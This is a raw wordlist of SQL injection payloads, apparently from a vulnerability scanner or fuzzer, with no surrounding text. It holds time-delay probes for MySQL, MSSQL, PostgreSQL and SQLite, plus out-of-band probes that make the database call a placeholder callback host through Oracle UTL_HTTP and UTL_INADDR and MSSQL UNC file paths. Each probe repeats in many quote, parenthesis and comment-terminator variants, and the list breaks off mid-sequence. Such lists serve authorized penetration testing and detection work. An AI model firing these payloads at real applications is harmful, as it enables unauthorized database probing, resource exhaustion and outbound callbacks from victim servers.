+BENCHMARK(100000000,MD5('A'))
+SLEEP(11)
+WAITFOR DELAY '00:00:11'
+(select * from fn_trace_gettable('\\{BC}\1.trc',default))
+pg_sleep(11) is not null
+HEX(RANDOMBLOB(10000000000/2))
+UTL_INADDR.get_host_name('10.0.0.1')
+UTL_INADDR.get_host_address('{BC}')
+UTL_HTTP.REQUEST('http://{BC}')
||BENCHMARK(100000000,MD5('A'))
||SLEEP(11)
||WAITFOR DELAY '00:00:11'
||(select * from fn_trace_gettable('\\{BC}\1.trc',default))
||pg_sleep(11) is not null
||HEX(RANDOMBLOB(10000000000/2))
||UTL_INADDR.get_host_name('10.0.0.1')
||UTL_INADDR.get_host_address('{BC}')
||UTL_HTTP.REQUEST('http://{BC}')
 and BENCHMARK(100000000,MD5('A'))
 and SLEEP(11)
 and WAITFOR DELAY '00:00:11'
 and (select * from fn_trace_gettable('\\{BC}\1.trc',default))
 and pg_sleep(11) is not null
 and HEX(RANDOMBLOB(10000000000/2))
 and UTL_INADDR.get_host_name('10.0.0.1')
 and UTL_INADDR.get_host_address('{BC}')
 and UTL_HTTP.REQUEST('http://{BC}')
+BENCHMARK(100000000,MD5('A'))  -- 
+BENCHMARK(100000000,MD5('A')) /* 
+BENCHMARK(100000000,MD5('A')))  -- 
+BENCHMARK(100000000,MD5('A'))) /* 
+BENCHMARK(100000000,MD5('A'))))  -- 
+BENCHMARK(100000000,MD5('A')))) /* 
+BENCHMARK(100000000,MD5('A')))))  -- 
+BENCHMARK(100000000,MD5('A'))))) /* 
+SLEEP(11)  -- 
+SLEEP(11) /* 
+SLEEP(11))  -- 
+SLEEP(11)) /* 
+SLEEP(11)))  -- 
+SLEEP(11))) /* 
+SLEEP(11))))  -- 
+SLEEP(11)))) /* 
+WAITFOR DELAY '00:00:11'  -- 
+WAITFOR DELAY '00:00:11' /* 
+WAITFOR DELAY '00:00:11')  -- 
+WAITFOR DELAY '00:00:11') /* 
+WAITFOR DELAY '00:00:11'))  -- 
+WAITFOR DELAY '00:00:11')) /* 
+WAITFOR DELAY '00:00:11')))  -- 
+WAITFOR DELAY '00:00:11'))) /* 
+(select * from fn_trace_gettable('\\{BC}\1.trc',default))  -- 
+(select * from fn_trace_gettable('\\{BC}\1.trc',default)) /* 
+(select * from fn_trace_gettable('\\{BC}\1.trc',default)))  -- 
+(select * from fn_trace_gettable('\\{BC}\1.trc',default))) /* 
+(select * from fn_trace_gettable('\\{BC}\1.trc',default))))  -- 
+(select * from fn_trace_gettable('\\{BC}\1.trc',default)))) /* 
+(select * from fn_trace_gettable('\\{BC}\1.trc',default)))))  -- 
+(select * from fn_trace_gettable('\\{BC}\1.trc',default))))) /* 
+pg_sleep(11) is not null  -- 
+pg_sleep(11) is not null /* 
+pg_sleep(11) is not null)  -- 
+pg_sleep(11) is not null) /* 
+pg_sleep(11) is not null))  -- 
+pg_sleep(11) is not null)) /* 
+pg_sleep(11) is not null)))  -- 
+pg_sleep(11) is not null))) /* 
+HEX(RANDOMBLOB(10000000000/2))  -- 
+HEX(RANDOMBLOB(10000000000/2)) /* 
+HEX(RANDOMBLOB(10000000000/2)))  -- 
+HEX(RANDOMBLOB(10000000000/2))) /* 
+HEX(RANDOMBLOB(10000000000/2))))  -- 
+HEX(RANDOMBLOB(10000000000/2)))) /* 
+HEX(RANDOMBLOB(10000000000/2)))))  -- 
+HEX(RANDOMBLOB(10000000000/2))))) /* 
+UTL_INADDR.get_host_name('10.0.0.1')  -- 
+UTL_INADDR.get_host_name('10.0.0.1') /* 
+UTL_INADDR.get_host_name('10.0.0.1'))  -- 
+UTL_INADDR.get_host_name('10.0.0.1')) /* 
+UTL_INADDR.get_host_name('10.0.0.1')))  -- 
+UTL_INADDR.get_host_name('10.0.0.1'))) /* 
+UTL_INADDR.get_host_name('10.0.0.1'))))  -- 
+UTL_INADDR.get_host_name('10.0.0.1')))) /* 
+UTL_INADDR.get_host_address('{BC}')  -- 
+UTL_INADDR.get_host_address('{BC}') /* 
+UTL_INADDR.get_host_address('{BC}'))  -- 
+UTL_INADDR.get_host_address('{BC}')) /* 
+UTL_INADDR.get_host_address('{BC}')))  -- 
+UTL_INADDR.get_host_address('{BC}'))) /* 
+UTL_INADDR.get_host_address('{BC}'))))  -- 
+UTL_INADDR.get_host_address('{BC}')))) /* 
+UTL_HTTP.REQUEST('http://{BC}')  -- 
+UTL_HTTP.REQUEST('http://{BC}') /* 
+UTL_HTTP.REQUEST('http://{BC}'))  -- 
+UTL_HTTP.REQUEST('http://{BC}')) /* 
+UTL_HTTP.REQUEST('http://{BC}')))  -- 
+UTL_HTTP.REQUEST('http://{BC}'))) /* 
+UTL_HTTP.REQUEST('http://{BC}'))))  -- 
+UTL_HTTP.REQUEST('http://{BC}')))) /* 
||BENCHMARK(100000000,MD5('A'))  -- 
||BENCHMARK(100000000,MD5('A')) /* 
||BENCHMARK(100000000,MD5('A')))  -- 
||BENCHMARK(100000000,MD5('A'))) /* 
||BENCHMARK(100000000,MD5('A'))))  -- 
||BENCHMARK(100000000,MD5('A')))) /* 
||BENCHMARK(100000000,MD5('A')))))  -- 
||BENCHMARK(100000000,MD5('A'))))) /* 
||SLEEP(11)  -- 
||SLEEP(11) /* 
||SLEEP(11))  -- 
||SLEEP(11)) /* 
||SLEEP(11)))  -- 
||SLEEP(11))) /* 
||SLEEP(11))))  -- 
||SLEEP(11)))) /* 
||WAITFOR DELAY '00:00:11'  -- 
||WAITFOR DELAY '00:00:11' /* 
||WAITFOR DELAY '00:00:11')  -- 
||WAITFOR DELAY '00:00:11') /* 
||WAITFOR DELAY '00:00:11'))  -- 
||WAITFOR DELAY '00:00:11')) /* 
||WAITFOR DELAY '00:00:11')))  -- 
||WAITFOR DELAY '00:00:11'))) /* 
||(select * from fn_trace_gettable('\\{BC}\1.trc',default))  -- 
||(select * from fn_trace_gettable('\\{BC}\1.trc',default)) /* 
||(select * from fn_trace_gettable('\\{BC}\1.trc',default)))  -- 
||(select * from fn_trace_gettable('\\{BC}\1.trc',default))) /* 
||(select * from fn_trace_gettable('\\{BC}\1.trc',default))))  -- 
||(select * from fn_trace_gettable('\\{BC}\1.trc',default)))) /* 
||(select * from fn_trace_gettable('\\{BC}\1.trc',default)))))  -- 
||(select * from fn_trace_gettable('\\{BC}\1.trc',default))))) /* 
||pg_sleep(11) is not null  -- 
||pg_sleep(11) is not null /* 
||pg_sleep(11) is not null)  -- 
||pg_sleep(11) is not null) /* 
||pg_sleep(11) is not null))  -- 
||pg_sleep(11) is not null)) /* 
||pg_sleep(11) is not null)))  -- 
||pg_sleep(11) is not null))) /* 
||HEX(RANDOMBLOB(10000000000/2))  -- 
||HEX(RANDOMBLOB(10000000000/2)) /* 
||HEX(RANDOMBLOB(10000000000/2)))  -- 
||HEX(RANDOMBLOB(10000000000/2))) /* 
||HEX(RANDOMBLOB(10000000000/2))))  -- 
||HEX(RANDOMBLOB(10000000000/2)))) /* 
||HEX(RANDOMBLOB(10000000000/2)))))  -- 
||HEX(RANDOMBLOB(10000000000/2))))) /* 
||UTL_INADDR.get_host_name('10.0.0.1')  -- 
||UTL_INADDR.get_host_name('10.0.0.1') /* 
||UTL_INADDR.get_host_name('10.0.0.1'))  -- 
||UTL_INADDR.get_host_name('10.0.0.1')) /* 
||UTL_INADDR.get_host_name('10.0.0.1')))  -- 
||UTL_INADDR.get_host_name('10.0.0.1'))) /* 
||UTL_INADDR.get_host_name('10.0.0.1'))))  -- 
||UTL_INADDR.get_host_name('10.0.0.1')))) /* 
||UTL_INADDR.get_host_address('{BC}')  -- 
||UTL_INADDR.get_host_address('{BC}') /* 
||UTL_INADDR.get_host_address('{BC}'))  -- 
||UTL_INADDR.get_host_address('{BC}')) /* 
||UTL_INADDR.get_host_address('{BC}')))  -- 
||UTL_INADDR.get_host_address('{BC}'))) /* 
||UTL_INADDR.get_host_address('{BC}'))))  -- 
||UTL_INADDR.get_host_address('{BC}')))) /* 
||UTL_HTTP.REQUEST('http://{BC}')  -- 
||UTL_HTTP.REQUEST('http://{BC}') /* 
||UTL_HTTP.REQUEST('http://{BC}'))  -- 
||UTL_HTTP.REQUEST('http://{BC}')) /* 
||UTL_HTTP.REQUEST('http://{BC}')))  -- 
||UTL_HTTP.REQUEST('http://{BC}'))) /* 
||UTL_HTTP.REQUEST('http://{BC}'))))  -- 
||UTL_HTTP.REQUEST('http://{BC}')))) /* 
 and BENCHMARK(100000000,MD5('A'))  -- 
 and BENCHMARK(100000000,MD5('A')) /* 
 and BENCHMARK(100000000,MD5('A')))  -- 
 and BENCHMARK(100000000,MD5('A'))) /* 
 and BENCHMARK(100000000,MD5('A'))))  -- 
 and BENCHMARK(100000000,MD5('A')))) /* 
 and BENCHMARK(100000000,MD5('A')))))  -- 
 and BENCHMARK(100000000,MD5('A'))))) /* 
 and SLEEP(11)  -- 
 and SLEEP(11) /* 
 and SLEEP(11))  -- 
 and SLEEP(11)) /* 
 and SLEEP(11)))  -- 
 and SLEEP(11))) /* 
 and SLEEP(11))))  -- 
 and SLEEP(11)))) /* 
 and WAITFOR DELAY '00:00:11'  -- 
 and WAITFOR DELAY '00:00:11' /* 
 and WAITFOR DELAY '00:00:11')  -- 
 and WAITFOR DELAY '00:00:11') /* 
 and WAITFOR DELAY '00:00:11'))  -- 
 and WAITFOR DELAY '00:00:11')) /* 
 and WAITFOR DELAY '00:00:11')))  -- 
 and WAITFOR DELAY '00:00:11'))) /* 
 and (select * from fn_trace_gettable('\\{BC}\1.trc',default))  -- 
 and (select * from fn_trace_gettable('\\{BC}\1.trc',default)) /* 
 and (select * from fn_trace_gettable('\\{BC}\1.trc',default)))  -- 
 and (select * from fn_trace_gettable('\\{BC}\1.trc',default))) /* 
 and (select * from fn_trace_gettable('\\{BC}\1.trc',default))))  -- 
 and (select * from fn_trace_gettable('\\{BC}\1.trc',default)))) /* 
 and (select * from fn_trace_gettable('\\{BC}\1.trc',default)))))  -- 
 and (select * from fn_trace_gettable('\\{BC}\1.trc',default))))) /* 
 and pg_sleep(11) is not null  -- 
 and pg_sleep(11) is not null /* 
 and pg_sleep(11) is not null)  -- 
 and pg_sleep(11) is not null) /* 
 and pg_sleep(11) is not null))  -- 
 and pg_sleep(11) is not null)) /* 
 and pg_sleep(11) is not null)))  -- 
 and pg_sleep(11) is not null))) /* 
 and HEX(RANDOMBLOB(10000000000/2))  -- 
 and HEX(RANDOMBLOB(10000000000/2)) /* 
 and HEX(RANDOMBLOB(10000000000/2)))  -- 
 and HEX(RANDOMBLOB(10000000000/2))) /* 
 and HEX(RANDOMBLOB(10000000000/2))))  -- 
 and HEX(RANDOMBLOB(10000000000/2)))) /* 
 and HEX(RANDOMBLOB(10000000000/2)))))  -- 
 and HEX(RANDOMBLOB(10000000000/2))))) /* 
 and UTL_INADDR.get_host_name('10.0.0.1')  -- 
 and UTL_INADDR.get_host_name('10.0.0.1') /* 
 and UTL_INADDR.get_host_name('10.0.0.1'))  -- 
 and UTL_INADDR.get_host_name('10.0.0.1')) /* 
 and UTL_INADDR.get_host_name('10.0.0.1')))  -- 
 and UTL_INADDR.get_host_name('10.0.0.1'))) /* 
 and UTL_INADDR.get_host_name('10.0.0.1'))))  -- 
 and UTL_INADDR.get_host_name('10.0.0.1')))) /* 
 and UTL_INADDR.get_host_address('{BC}')  -- 
 and UTL_INADDR.get_host_address('{BC}') /* 
 and UTL_INADDR.get_host_address('{BC}'))  -- 
 and UTL_INADDR.get_host_address('{BC}')) /* 
 and UTL_INADDR.get_host_address('{BC}')))  -- 
 and UTL_INADDR.get_host_address('{BC}'))) /* 
 and UTL_INADDR.get_host_address('{BC}'))))  -- 
 and UTL_INADDR.get_host_address('{BC}')))) /* 
 and UTL_HTTP.REQUEST('http://{BC}')  -- 
 and UTL_HTTP.REQUEST('http://{BC}') /* 
 and UTL_HTTP.REQUEST('http://{BC}'))  -- 
 and UTL_HTTP.REQUEST('http://{BC}')) /* 
 and UTL_HTTP.REQUEST('http://{BC}')))  -- 
 and UTL_HTTP.REQUEST('http://{BC}'))) /* 
 and UTL_HTTP.REQUEST('http://{BC}'))))  -- 
 and UTL_HTTP.REQUEST('http://{BC}')))) /* 
'+BENCHMARK(100000000,MD5('A'))+'a
'+SLEEP(11)+'a
'+WAITFOR DELAY '00:00:11'+'a
'+(select * from fn_trace_gettable('\\{BC}\1.trc',default))+'a
'+pg_sleep(11) is not null+'a
'+HEX(RANDOMBLOB(10000000000/2))+'a
'+UTL_INADDR.get_host_name('10.0.0.1')+'a
'+UTL_INADDR.get_host_address('{BC}')+'a
'+UTL_HTTP.REQUEST('http://{BC}')+'a
'||BENCHMARK(100000000,MD5('A'))||'a
'||SLEEP(11)||'a
'||WAITFOR DELAY '00:00:11'||'a
'||(select * from fn_trace_gettable('\\{BC}\1.trc',default))||'a
'||pg_sleep(11) is not null||'a
'||HEX(RANDOMBLOB(10000000000/2))||'a
'||UTL_INADDR.get_host_name('10.0.0.1')||'a
'||UTL_INADDR.get_host_address('{BC}')||'a
'||UTL_HTTP.REQUEST('http://{BC}')||'a
' and BENCHMARK(100000000,MD5('A')) and 'a
' and SLEEP(11) and 'a
' and WAITFOR DELAY '00:00:11' and 'a
' and (select * from fn_trace_gettable('\\{BC}\1.trc',default)) and 'a
' and pg_sleep(11) is not null and 'a
' and HEX(RANDOMBLOB(10000000000/2)) and 'a
' and UTL_INADDR.get_host_name('10.0.0.1') and 'a
' and UTL_INADDR.get_host_address('{BC}') and 'a
' and UTL_HTTP.REQUEST('http://{BC}') and 'a
"+BENCHMARK(100000000,MD5('A'))+"a
"+SLEEP(11)+"a
"+WAITFOR DELAY '00:00:11'+"a
"+(select * from fn_trace_gettable('\\{BC}\1.trc',default))+"a
"+pg_sleep(11) is not null+"a
"+HEX(RANDOMBLOB(10000000000/2))+"a
"+UTL_INADDR.get_host_name('10.0.0.1')+"a
"+UTL_INADDR.get_host_address('{BC}')+"a
"+UTL_HTTP.REQUEST('http://{BC}')+"a
"||BENCHMARK(100000000,MD5('A'))||"a
"||SLEEP(11)||"a
"||WAITFOR DELAY '00:00:11'||"a
"||(select * from fn_trace_gettable('\\{BC}\1.trc',default))||"a
"||pg_sleep(11) is not null||"a
"||HEX(RANDOMBLOB(10000000000/2))||"a
"||UTL_INADDR.get_host_name('10.0.0.1')||"a
"||UTL_INADDR.get_host_address('{BC}')||"a
"||UTL_HTTP.REQUEST('http://{BC}')||"a
" and BENCHMARK(100000000,MD5('A')) and "a
" and SLEEP(11) and "a
" and WAITFOR DELAY '00:00:11' and "a
" and (select * from fn_trace_gettable('\\{BC}\1.trc',default)) and "a
" and pg_sleep(11) is not null and "a
" and HEX(RANDOMBLOB(10000000000/2)) and "a
" and UTL_INADDR.get_host_name('10.0.0.1') and "a
" and UTL_INADDR.get_host_address('{BC}') and "a
" and UTL_HTTP.REQUEST('http://{BC}') and "a
')+BENCHMARK(100000000,MD5('A'))+('a
')+SLEEP(11)+('a
')+WAITFOR DELAY '00:00:11'+('a
')+(select * from fn_trace_gettable('\\{BC}\1.trc',default))+('a
')+pg_sleep(11) is not null+('a
')+HEX(RANDOMBLOB(10000000000/2))+('a
')+UTL_INADDR.get_host_name('10.0.0.1')+('a
')+UTL_INADDR.get_host_address('{BC}')+('a
')+UTL_HTTP.REQUEST('http://{BC}')+('a
')||BENCHMARK(100000000,MD5('A'))||('a
')||SLEEP(11)||('a
')||WAITFOR DELAY '00:00:11'||('a
')||(select * from fn_trace_gettable('\\{BC}\1.trc',default))||('a
')||pg_sleep(11) is not null||('a
')||HEX(RANDOMBLOB(10000000000/2))||('a
')||UTL_INADDR.get_host_name('10.0.0.1')||('a
')||UTL_INADDR.get_host_address('{BC}')||('a
')||UTL_HTTP.REQUEST('http://{BC}')||('a
') and BENCHMARK(100000000,MD5('A')) and ('a
') and SLEEP(11) and ('a
') and WAITFOR DELAY '00:00:11' and ('a
') and (select * from fn_trace_gettable('\\{BC}\1.trc',default)) and ('a
') and pg_sleep(11) is not null and ('a
') and HEX(RANDOMBLOB(10000000000/2)) and ('a
') and UTL_INADDR.get_host_name('10.0.0.1') and ('a
') and UTL_INADDR.get_host_address('{BC}') and ('a
') and UTL_HTTP.REQUEST('http://{BC}') and ('a
")+BENCHMARK(100000000,MD5('A'))+("a
")+SLEEP(11)+("a
")+WAITFOR DELAY '00:00:11'+("a
")+(select * from fn_trace_gettable('\\{BC}\1.trc',default))+("a
")+pg_sleep(11) is not null+("a
")+HEX(RANDOMBLOB(10000000000/2))+("a
")+UTL_INADDR.get_host_name('10.0.0.1')+("a
")+UTL_INADDR.get_host_address('{BC}')+("a
")+UTL_HTTP.REQUEST('http://{BC}')+("a
")||BENCHMARK(100000000,MD5('A'))||("a
")||SLEEP(11)||("a
")||WAITFOR DELAY '00:00:11'||("a
")||(select * from fn_trace_gettable('\\{BC}\1.trc',default))||("a
")||pg_sleep(11) is not null||("a
")||HEX(RANDOMBLOB(10000000000/2))||("a
")||UTL_INADDR.get_host_name('10.0.0.1')||("a
")||UTL_INADDR.get_host_address('{BC}')||("a
")||UTL_HTTP.REQUEST('http://{BC}')||("a
") and BENCHMARK(100000000,MD5('A')) and ("a
") and SLEEP(11) and ("a
") and WAITFOR DELAY '00:00:11' and ("a
") and (select * from fn_trace_gettable('\\{BC}\1.trc',default)) and ("a
") and pg_sleep(11) is not null and ("a
") and HEX(RANDOMBLOB(10000000000/2)) and ("a
") and UTL_INADDR.get_host_name('10.0.0.1') and ("a
") and UTL_INADDR.get_host_address('{BC}') and ("a
") and UTL_HTTP.REQUEST('http://{BC}') and ("a
'+BENCHMARK(100000000,MD5('A'))  -- 
'+BENCHMARK(100000000,MD5('A')) /* 
'+BENCHMARK(100000000,MD5('A')))  -- 
'+BENCHMARK(100000000,MD5('A'))) /* 
'+BENCHMARK(100000000,MD5('A'))))  -- 
'+BENCHMARK(100000000,MD5('A')))) /* 
'+BENCHMARK(100000000,MD5('A')))))  -- 
'+BENCHMARK(100000000,MD5('A'))))) /* 
'+SLEEP(11)  -- 
'+SLEEP(11) /* 
'+SLEEP(11))  -- 
'+SLEEP(11)) /* 
'+SLEEP(11)))  -- 
'+SLEEP(11))) /* 
'+SLEEP(11))))  -- 
'+SLEEP(11)))) /* 
'+WAITFOR DELAY '00:00:11'  -- 
'+WAITFOR DELAY '00:00:11' /* 
'+WAITFOR DELAY '00:00:11')  -- 
'+WAITFOR DELAY '00:00:11') /* 
'+WAITFOR DELAY '00:00:11'))  -- 
'+WAITFOR DELAY '00:00:11')) /* 
'+WAITFOR DELAY '00:00:11')))  -- 
'+WAITFOR DELAY '00:00:11'))) /* 
'+(select * from fn_trace_gettable('\\{BC}\1.trc',default))  -- 
'+(select * from fn_trace_gettable('\\{BC}\1.trc',default)) /* 
'+(select * from fn_trace_gettable('\\{BC}\1.trc',default)))  -- 
'+(select * from fn_trace_gettable('\\{BC}\1.trc',default))) /* 
'+(select * from fn_trace_gettable('\\{BC}\1.trc',default))))  -- 
'+(select * from fn_trace_gettable('\\{BC}\1.trc',default)))) /* 
'+(select * from fn_trace_gettable('\\{BC}\1.trc',default)))))  -- 
'+(select * from fn_trace_gettable('\\{BC}\1.trc',default))))) /* 
'+pg_sleep(11) is not null  -- 
'+pg_sleep(11) is not null /* 
'+pg_sleep(11) is not null)  -- 
'+pg_sleep(11) is not null) /* 
'+pg_sleep(11) is not null))  -- 
'+pg_sleep(11) is not null)) /* 
'+pg_sleep(11) is not null)))  -- 
'+pg_sleep(11) is not null))) /* 
'+HEX(RANDOMBLOB(10000000000/2))  -- 
'+HEX(RANDOMBLOB(10000000000/2)) /* 
'+HEX(RANDOMBLOB(10000000000/2)))  -- 
'+HEX(RANDOMBLOB(10000000000/2))) /* 
'+HEX(RANDOMBLOB(10000000000/2))))  -- 
'+HEX(RANDOMBLOB(10000000000/2)))) /* 
'+HEX(RANDOMBLOB(10000000000/2)))))  -- 
'+HEX(RANDOMBLOB(10000000000/2))))) /* 
'+UTL_INADDR.get_host_name('10.0.0.1')  -- 
'+UTL_INADDR.get_host_name('10.0.0.1') /* 
'+UTL_INADDR.get_host_name('10.0.0.1'))  -- 
'+UTL_INADDR.get_host_name('10.0.0.1')) /* 
'+UTL_INADDR.get_host_name('10.0.0.1')))  -- 
'+UTL_INADDR.get_host_name('10.0.0.1'))) /* 
'+UTL_INADDR.get_host_name('10.0.0.1'))))  -- 
'+UTL_INADDR.get_host_name('10.0.0.1')))) /* 
'+UTL_INADDR.get_host_address('{BC}')  -- 
'+UTL_INADDR.get_host_address('{BC}') /* 
'+UTL_INADDR.get_host_address('{BC}'))  -- 
'+UTL_INADDR.get_host_address('{BC}')) /* 
'+UTL_INADDR.get_host_address('{BC}')))  -- 
'+UTL_INADDR.get_host_address('{BC}'))) /* 
'+UTL_INADDR.get_host_address('{BC}'))))  -- 
'+UTL_INADDR.get_host_address('{BC}')))) /* 
'+UTL_HTTP.REQUEST('http://{BC}')  -- 
'+UTL_HTTP.REQUEST('http://{BC}') /* 
'+UTL_HTTP.REQUEST('http://{BC}'))  -- 
'+UTL_HTTP.REQUEST('http://{BC}')) /* 
'+UTL_HTTP.REQUEST('http://{BC}')))  -- 
'+UTL_HTTP.REQUEST('http://{BC}'))) /* 
'+UTL_HTTP.REQUEST('http://{BC}'))))  -- 
'+UTL_HTTP.REQUEST('http://{BC}')))) /* 
'||BENCHMARK(100000000,MD5('A'))  -- 
'||BENCHMARK(100000000,MD5('A')) /* 
'||BENCHMARK(100000000,MD5('A')))  -- 
'||BENCHMARK(100000000,MD5('A'))) /* 
'||BENCHMARK(100000000,MD5('A'))))  -- 
'||BENCHMARK(100000000,MD5('A')))) /* 
'||BENCHMARK(100000000,MD5('A')))))  -- 
'||BENCHMARK(100000000,MD5('A'))))) /* 
'||SLEEP(11)  -- 
'||SLEEP(11) /* 
'||SLEEP(11))  -- 
'||SLEEP(11)) /* 
'||SLEEP(11)))  -- 
'||SLEEP(11))) /* 
'||SLEEP(11))))  -- 
'||SLEEP(11)))) /* 
'||WAITFOR DELAY '00:00:11'  -- 
'||WAITFOR DELAY '00:00:11' /* 
'||WAITFOR DELAY '00:00:11')  -- 
'||WAITFOR DELAY '00:00:11') /* 
'||WAITFOR DELAY '00:00:11'))  -- 
'||WAITFOR DELAY '00:00:11')) /* 
'||WAITFOR DELAY '00:00:11')))  -- 
'||WAITFOR DELAY '00:00:11'))) /* 
'||(select * from fn_trace_gettable('\\{BC}\1.trc',default))  -- 
'||(select * from fn_trace_gettable('\\{BC}\1.trc',default)) /* 
'||(select * from fn_trace_gettable('\\{BC}\1.trc',default)))  -- 
'||(select * from fn_trace_gettable('\\{BC}\1.trc',default))) /* 
'||(select * from fn_trace_gettable('\\{BC}\1.trc',default))))  -- 
'||(select * from fn_trace_gettable('\\{BC}\1.trc',default)))) /* 
'||(select * from fn_trace_gettable('\\{BC}\1.trc',default)))))  -- 
'||(select * from fn_trace_gettable('\\{BC}\1.trc',default))))) /* 
'||pg_sleep(11) is not null  -- 
'||pg_sleep(11) is not null /* 
'||pg_sleep(11) is not null)  -- 
'||pg_sleep(11) is not null) /* 
'||pg_sleep(11) is not null))  -- 
'||pg_sleep(11) is not null)) /* 
'||pg_sleep(11) is not null)))  -- 
'||pg_sleep(11) is not null))) /* 
'||HEX(RANDOMBLOB(10000000000/2))  -- 
'||HEX(RANDOMBLOB(10000000000/2)) /* 
'||HEX(RANDOMBLOB(10000000000/2)))  -- 
'||HEX(RANDOMBLOB(10000000000/2))) /* 
'||HEX(RANDOMBLOB(10000000000/2))))  -- 
'||HEX(RANDOMBLOB(10000000000/2)))) /* 
'||HEX(RANDOMBLOB(10000000000/2)))))  -- 
'||HEX(RANDOMBLOB(10000000000/2))))) /* 
'||UTL_INADDR.get_host_name('10.0.0.1')  -- 
'||UTL_INADDR.get_host_name('10.0.0.1') /* 
'||UTL_INADDR.get_host_name('10.0.0.1'))  -- 
'||UTL_INADDR.get_host_name('10.0.0.1')) /* 
'||UTL_INADDR.get_host_name('10.0.0.1')))  -- 
'||UTL_INADDR.get_host_name('10.0.0.1'))) /* 
'||UTL_INADDR.get_host_name('10.0.0.1'))))  -- 
'||UTL_INADDR.get_host_name('10.0.0.1')))) /* 
'||UTL_INADDR.get_host_address('{BC}')  -- 
'||UTL_INADDR.get_host_address('{BC}') /* 
'||UTL_INADDR.get_host_address('{BC}'))  -- 
'||UTL_INADDR.get_host_address('{BC}')) /* 
'||UTL_INADDR.get_host_address('{BC}')))  -- 
'||UTL_INADDR.get_host_address('{BC}'))) /* 
'||UTL_INADDR.get_host_address('{BC}'))))  -- 
'||UTL_INADDR.get_host_address('{BC}')))) /* 
'||UTL_HTTP.REQUEST('http://{BC}')  -- 
'||UTL_HTTP.REQUEST('http://{BC}') /* 
'||UTL_HTTP.REQUEST('http://{BC}'))  -- 
'||UTL_HTTP.REQUEST('http://{BC}')) /* 
'||UTL_HTTP.REQUEST('http://{BC}')))  -- 
'||UTL_HTTP.REQUEST('http://{BC}'))) /* 
'||UTL_HTTP.REQUEST('http://{BC}'))))  -- 
'||UTL_HTTP.REQUEST('http://{BC}')))) /* 
' and BENCHMARK(100000000,MD5('A'))  -- 
' and BENCHMARK(100000000,MD5('A')) /* 
' and BENCHMARK(100000000,MD5('A')))  -- 
' and BENCHMARK(100000000,MD5('A'))) /* 
' and BENCHMARK(100000000,MD5('A'))))  -- 
' and BENCHMARK(100000000,MD5('A')))) /* 
' and BENCHMARK(100000000,MD5('A')))))  -- 
' and BENCHMARK(100000000,MD5('A'))))) /* 
' and SLEEP(11)  -- 
' and SLEEP(11) /* 
' and SLEEP(11))  -- 
' and SLEEP(11)) /* 
' and SLEEP(11)))  -- 
' and SLEEP(11))) /* 
' and SLEEP(11))))  -- 
' and SLEEP(11)))) /* 
' and WAITFOR DELAY '00:00:11'  -- 
' and WAITFOR DELAY '00:00:11' /* 
' and WAITFOR DELAY '00:00:11')  -- 
' and WAITFOR DELAY '00:00:11') /* 
' and WAITFOR DELAY '00:00:11'))  -- 
' and WAITFOR DELAY '00:00:11')) /* 
' and WAITFOR DELAY '00:00:11')))  -- 
' and WAITFOR DELAY '00:00:11'))) /* 
' and (select * from fn_trace_gettable('\\{BC}\1.trc',default))  -- 
' and (select * from fn_trace_gettable('\\{BC}\1.trc',default)) /* 
' and (select * from fn_trace_gettable('\\{BC}\1.trc',default)))  -- 
' and (select * from fn_trace_gettable('\\{BC}\1.trc',default))) /* 
' and (select * from fn_trace_gettable('\\{BC}\1.trc',default))))  -- 
' and (select * from fn_trace_gettable('\\{BC}\1.trc',default)))) /* 
' and (select * from fn_trace_gettable('\\{BC}\1.trc',default)))))  -- 
' and (select * from fn_trace_gettable('\\{BC}\1.trc',default))))) /* 
' and pg_sleep(11) is not null  -- 
' and pg_sleep(11) is not null /* 
' and pg_sleep(11) is not null)  -- 
' and pg_sleep(11) is not null) /* 
' and pg_sleep(11) is not null))  -- 
' and pg_sleep(11) is not null)) /* 
' and pg_sleep(11) is not null)))  -- 
' and pg_sleep(11) is not null))) /* 
' and HEX(RANDOMBLOB(10000000000/2))  -- 
' and HEX(RANDOMBLOB(10000000000/2)) /* 
' and HEX(RANDOMBLOB(10000000000/2)))  -- 
' and HEX(RANDOMBLOB(10000000000/2))) /* 
' and HEX(RANDOMBLOB(10000000000/2))))  -- 
' and HEX(RANDOMBLOB(10000000000/2)))) /* 
' and HEX(RANDOMBLOB(10000000000/2)))))  -- 
' and HEX(RANDOMBLOB(10000000000/2))))) /* 
' and UTL_INADDR.get_host_name('10.0.0.1')  -- 
' and UTL_INADDR.get_host_name('10.0.0.1') /* 
' and UTL_INADDR.get_host_name('10.0.0.1'))  -- 
' and UTL_INADDR.get_host_name('10.0.0.1')) /* 
' and UTL_INADDR.get_host_name('10.0.0.1')))  -- 
' and UTL_INADDR.get_host_name('10.0.0.1'))) /* 
' and UTL_INADDR.get_host_name('10.0.0.1'))))  -- 
' and UTL_INADDR.get_host_name('10.0.0.1')))) /* 
' and UTL_INADDR.get_host_address('{BC}')  -- 
' and UTL_INADDR.get_host_address('{BC}') /* 
' and UTL_INADDR.get_host_address('{BC}'))  -- 
' and UTL_INADDR.get_host_address('{BC}')) /* 
' and UTL_INADDR.get_host_address('{BC}')))  -- 
' and UTL_INADDR.get_host_address('{BC}'))) /* 
' and UTL_INADDR.get_host_address('{BC}'))))  -- 
' and UTL_INADDR.get_host_address('{BC}')))) /* 
' and UTL_HTTP.REQUEST('http://{BC}')  -- 
' and UTL_HTTP.REQUEST('http://{BC}') /* 
' and UTL_HTTP.REQUEST('http://{BC}'))  -- 
' and UTL_HTTP.REQUEST('http://{BC}')) /* 
' and UTL_HTTP.REQUEST('http://{BC}')))  -- 
' and UTL_HTTP.REQUEST('http://{BC}'))) /* 
' and UTL_HTTP.REQUEST('http://{BC}'))))  -- 
' and UTL_HTTP.REQUEST('http://{BC}')))) /* 
"+BENCHMARK(100000000,MD5('A'))  -- 
"+BENCHMARK(100000000,MD5('A')) /* 
"+BENCHMARK(100000000,MD5('A')))  -- 
"+BENCHMARK(100000000,MD5('A'))) /* 
"+BENCHMARK(100000000,MD5('A'))))  -- 
"+BENCHMARK(100000000,MD5('A')))) /* 
"+BENCHMARK(100000000,MD5('A')))))  -- 
"+BENCHMARK(100000000,MD5('A'))))) /* 
"+SLEEP(11)  -- 
"+SLEEP(11) /* 
"+SLEEP(11))  -- 
"+SLEEP(11)) /* 
"+SLEEP(11)))  -- 
"+SLEEP(11))) /* 
"+SLEEP(11))))  -- 
"+SLEEP(11)))) /* 
"+WAITFOR DELAY '00:00:11'  -- 
"+WAITFOR DELAY '00:00:11' /* 
"+WAITFOR DELAY '00:00:11')  -- 
"+WAITFOR DELAY '00:00:11') /* 
